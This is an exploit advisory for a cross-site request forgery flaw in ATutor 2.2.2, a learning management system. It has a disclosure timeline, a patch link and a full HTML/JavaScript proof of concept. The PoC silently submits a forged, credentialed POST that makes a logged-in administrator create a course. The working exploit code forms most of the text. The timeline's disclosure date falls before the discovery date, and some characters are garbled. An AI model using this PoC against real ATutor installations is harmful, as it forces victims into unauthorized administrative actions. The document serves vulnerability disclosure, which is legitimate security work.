ATutor 2.2.2 Cross Site Request Forgery
Posted on 14 November 2016
# Exploit Title: ATutor_2.2.2 Learning Management System # Cross-Site Request Forgery (Add New Course) # Date: 13-11-2016 # Software Link: https://github.com/atutor/ATutor/releases/tag/atutor_2_2_2 # Vendor: http://www.atutor.ca/ # Exploit Author: Saravana Kumar # Contact: https://facebook.com/06saravanakumar # Category: webapps # Version: 2.2.2 # Platform: PHP # Tested on: [Kali Linux 2.0 | Windows 7] # Email: 06saravanakumar@gmail.com # Affected URL: http://localhost/ATutor/mods/_core/courses/users/create_course.php ================================== Vulnerability Disclosure Timeline:a"==================================a"2016-11-07: Found the vulnerability and Reported to Vendor.a"2016-11-08: Vendor Replied.a"2016-11-10: Vendor Fixed the vulnerability.a"2016-11-11: Patch releaseda"2016-10-12: Public Disclosure ########################### CSRF PoC ############################### <html> <------ CSRF POC ------> <body> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http://localhost/ATutor/mods/_core/courses/users/create_course.php", true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------34481053430281"); xhr.withCredentials = true; var body = "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="form_course" " + " " + "true " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="MAX_FILE_SIZE" " + " " + "819200 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="course" " + " " + "0 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="old_access" " + " " + "protected " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="created_date" " + " " + "2016-11-07 06:55:20 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="show_courses" " + " " + "0 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="current_cat" " + " " + "0 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="title" " + " " + "Programming Language " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="pri_lang" " + " " + "en " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="description" " + " " + "Python " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="category_parent" " + " " + "0 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="content_packaging" " + " " + "top " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="rss" " + " " + "0 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="access" " + " " + "protected " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="release_date" " + " " + "0 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="day_release" " + " " + "1 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="month_release" " + " " + "1 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="year_release" " + " " + "2016 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="hour_release" " + " " + "0 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="min_release" " + " " + "0 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="end_date" " + " " + "0 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="day_end" " + " " + "1 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="month_end" " + " " + "1 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="year_end" " + " " + "2017 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="hour_end" " + " " + "0 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="min_end" " + " " + "0 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="setvisual" " + " " + "1 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="banner" " + " " + "x3cpx3eCan fill content what ever you want.x3c/px3e " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="initial_content" " + " " + "1 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="quota" " + " " + "-2 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="filesize" " + " " + "-3 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="tracking" " + " " + " " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="copyright" " + " " + " " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="boolForce" " + " " + " " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="icon" " + " " + " " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="MAX_FILE_SIZE" " + " " + "819200 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="customicon"; filename="" " + "Content-Type: application/octet-stream " + " " + " " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="custOptCount" " + " " + "0 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="courseId" " + " " + " " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="submit" " + " " + "Save " + "-----------------------------34481053430281-- "; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form> </body> </html> --------------------------------------------------------------------------- Solution: Patch is available. Install patch using the ATutor Patcher. Link to download patch: http://update.atutor.ca/patch/2_2_2/2_2_2-6/patch.xml ---------------------------------------------------------------------------
